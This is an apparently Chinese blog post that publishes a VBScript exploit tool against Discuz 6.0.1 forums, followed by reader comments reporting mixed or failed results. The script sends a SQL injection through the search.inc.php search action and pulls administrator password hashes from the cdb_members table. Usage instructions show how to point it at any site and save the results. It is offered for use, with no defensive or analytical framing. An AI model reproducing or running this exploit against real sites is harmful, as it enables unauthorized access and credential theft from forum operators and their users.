discuz获取任意管理员密码漏洞利用工具vbs版

作者:Safe3
原文链接

本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版
也利于修改

以下是search.inc.php 文件漏洞利用代码VBS版

Dim strUrl,strSite,strPath,strUid

showB()
Set Args = Wscript.Arguments

If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If

strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"

Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)

Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

获得的密码大家自己在result.txt中查找

相关日志

楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

  • kkkk

    请问怎么输出为1.txt 后 没有密码啊

  • t-h4ck

    你没成功··

  • knife

    不行好像

  • 温热威尔

    输出了很多东西 但是不知道那找到密码 晕

  • 小智

    我拿了 6.0.1试了“文本里没有

  • 当初你一个工具就让我安装了python,并且看了几天python的书,如今ni

    本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版

    ~~
    气死我了

发表评论